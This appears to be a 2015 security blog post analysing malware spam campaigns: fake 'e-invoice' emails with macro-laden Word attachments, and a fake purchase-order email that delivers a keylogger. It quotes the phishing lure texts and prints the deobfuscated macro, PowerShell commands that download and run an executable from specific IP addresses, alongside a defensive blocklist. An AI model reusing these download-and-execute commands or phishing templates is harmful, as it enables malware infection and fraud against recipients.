95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
From: Lydia OnealThe company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';The macro is calling Powershell to download and execute code from these locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
Tuesday 10 February 2015
Malware spam: "Megtrade groups [venkianch@gmail.com]" / "RE: Purchase Order Copy"
This spam comes with a malicious attachment:
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.
From: Megtrade groups [venkianch@gmail.com]Unusually, this email does not appear to be sent out by a botnet but has been sent through Gmail. The link in the email goes www.ebayonline.com.ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named (1) Purchase Order Copy.pdf ___________________ (2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf or in .exe
Reply-To: venkanch@gmail.com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd
Download Attachment As zip
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.
Subscribe to:
Posts (Atom)